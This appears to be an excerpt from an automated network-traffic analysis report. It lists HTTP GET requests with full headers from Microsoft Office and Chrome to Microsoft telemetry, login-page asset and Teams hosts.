Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v2 HTTP/1.1Host: teams.microsoft.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v2/ HTTP/1.1Host: teams.microsoft.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
